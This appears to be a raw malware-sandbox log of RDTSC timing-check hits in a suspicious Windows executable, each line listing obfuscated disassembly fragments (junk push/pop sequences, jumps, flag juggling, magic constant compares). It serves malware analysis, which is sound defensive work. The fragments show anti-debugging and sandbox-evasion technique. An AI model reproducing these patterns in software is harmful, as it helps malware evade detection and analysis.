Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0092 second address: 53C0097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0097 second address: 53C00D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a call 00007F07E8D7A962h 0x0000000f mov dx, cx 0x00000012 pop esi 0x00000013 call 00007F07E8D7A967h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C00D0 second address: 53C0107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 and esp, FFFFFFF8h 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F07E8CE6A8Bh 0x00000010 jmp 00007F07E8CE6A93h 0x00000015 popfd 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ax, di 0x0000001e mov dx, 3CFEh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0107 second address: 53C010D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C010D second address: 53C013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b jmp 00007F07E8CE6A8Ah 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F07E8CE6A90h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C013A second address: 53C013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C013E second address: 53C0144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0144 second address: 53C014A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C014A second address: 53C014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C014E second address: 53C0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F07E8D7A968h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0171 second address: 53C01C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F07E8CE6A97h 0x0000000b xor esi, 46A339CEh 0x00000011 jmp 00007F07E8CE6A99h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebx, dword ptr [ebp+10h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F07E8CE6A8Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C01C3 second address: 53C01C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C01C9 second address: 53C024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F07E8CE6A94h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 push esi 0x00000013 call 00007F07E8CE6A8Dh 0x00000018 pop ecx 0x00000019 pop edi 0x0000001a push eax 0x0000001b movsx edi, si 0x0000001e pop esi 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F07E8CE6A8Eh 0x0000002c xor al, 00000038h 0x0000002f jmp 00007F07E8CE6A8Bh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007F07E8CE6A98h 0x0000003b sub ah, FFFFFF98h 0x0000003e jmp 00007F07E8CE6A8Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C024D second address: 53C0265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A964h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0265 second address: 53C0274 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0274 second address: 53C0278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0278 second address: 53C0291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0291 second address: 53C02CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F07E8D7A95Ah 0x00000009 jmp 00007F07E8D7A965h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F07E8D7A95Fh 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C02CF second address: 53C02E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C02E8 second address: 53C030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F07E8D7A968h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C030C second address: 53C0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0312 second address: 53C03D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F085A8E8C46h 0x00000011 pushad 0x00000012 mov si, 9933h 0x00000016 pushfd 0x00000017 jmp 00007F07E8D7A968h 0x0000001c sub ch, 00000038h 0x0000001f jmp 00007F07E8D7A95Bh 0x00000024 popfd 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d pushad 0x0000002e movzx esi, bx 0x00000031 mov bx, 8F14h 0x00000035 popad 0x00000036 je 00007F085A8E8C18h 0x0000003c jmp 00007F07E8D7A963h 0x00000041 mov edx, dword ptr [esi+44h] 0x00000044 jmp 00007F07E8D7A966h 0x00000049 or edx, dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov edx, 05EB2810h 0x00000054 pushfd 0x00000055 jmp 00007F07E8D7A969h 0x0000005a add esi, 0928F696h 0x00000060 jmp 00007F07E8D7A961h 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C03D9 second address: 53C0403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F07E8CE6A8Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0403 second address: 53C0413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A95Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0413 second address: 53C043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F085A854CF3h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bh, al 0x00000013 call 00007F07E8CE6A95h 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C043D second address: 53C0482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F07E8D7A960h 0x00000012 jne 00007F085A8E8B94h 0x00000018 jmp 00007F07E8D7A960h 0x0000001d test bl, 00000007h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0482 second address: 53C0488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B07B9 second address: 53B07BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B07BF second address: 53B07C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B07C3 second address: 53B07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx ebx, ax 0x00000013 call 00007F07E8D7A95Ch 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B07F2 second address: 53B0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F085A85C60Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F07E8CE6A97h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B0825 second address: 53B085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 movzx ecx, di 0x00000014 mov ax, bx 0x00000017 popad 0x00000018 mov ecx, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 mov ebx, 713DD29Ch 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B085F second address: 53B088B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 0E771407h 0x00000008 mov ax, E9A3h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F085A85C5BBh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F07E8CE6A95h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B088B second address: 53B08D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, C432h 0x00000007 jmp 00007F07E8D7A963h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test byte ptr [76FB6968h], 00000002h 0x00000016 jmp 00007F07E8D7A966h 0x0000001b jne 00007F085A8F0447h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B08D0 second address: 53B08D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B08D5 second address: 53B08FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F07E8D7A962h 0x00000009 sub ecx, 717656D8h 0x0000000f jmp 00007F07E8D7A95Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B08FF second address: 53B094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, dword ptr [ebp+0Ch] 0x0000000a jmp 00007F07E8CE6A94h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F07E8CE6A90h 0x00000015 push eax 0x00000016 jmp 00007F07E8CE6A8Bh 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov al, 91h 0x0000001f mov eax, edi 0x00000021 popad 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bl, 1Ah 0x00000028 mov esi, 0749389Dh 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B094D second address: 53B0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A966h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B0967 second address: 53B096B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53B096B second address: 53B099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007F07E8D7A967h 0x00000010 push dword ptr [ebp+14h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 4D5A0546h 0x0000001b mov ecx, edi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0D6F second address: 53C0DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F07E8CE6A8Ch 0x00000011 sub ch, 00000058h 0x00000014 jmp 00007F07E8CE6A8Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov eax, 54B11FA5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0DB1 second address: 53C0DC0 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0DC0 second address: 53C0DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0DC4 second address: 53C0DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0DCA second address: 53C0DE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0DE7 second address: 53C0E22 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F07E8D7A961h 0x0000000e pop ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F07E8D7A95Ah 0x00000018 adc esi, 6E983378h 0x0000001e jmp 00007F07E8D7A95Bh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0AD0 second address: 53C0AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0AE1 second address: 53C0AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0AE5 second address: 53C0B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0B00 second address: 53C0B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0B06 second address: 53C0B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0B0A second address: 53C0B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F07E8D7A95Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0B21 second address: 53C0B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0B33 second address: 53C0B65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F07E8D7A966h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edi, cx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53C0B65 second address: 53C0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 544063F second address: 5440644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5440644 second address: 544064A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 544064A second address: 544067C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F07E8D7A967h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 544067C second address: 5440694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5440694 second address: 5440698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5440698 second address: 54406DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, eax 0x0000000c mov bl, al 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F07E8CE6A8Ch 0x00000018 pushfd 0x00000019 jmp 00007F07E8CE6A92h 0x0000001e adc eax, 621AE188h 0x00000024 jmp 00007F07E8CE6A8Bh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54406DD second address: 54406E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54406E3 second address: 54406F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 7A3B6CEFh 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 54406F8 second address: 5440719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, bh 0x0000000f mov eax, 184AC8EBh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430A3C second address: 5430A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430A42 second address: 5430A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8D7A95Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430A53 second address: 5430A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430A57 second address: 5430A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F07E8D7A969h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430A7B second address: 5430AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F07E8CE6A8Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F07E8CE6A8Dh 0x0000001b mov di, cx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 543091F second address: 5430925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430925 second address: 5430929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430929 second address: 5430957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F07E8D7A966h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 5430957 second address: 5430972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov ecx, ebx 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: 53D018F second address: 53D01B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, F7E0h 0x00000011 popad 0x00000012 rdtsc
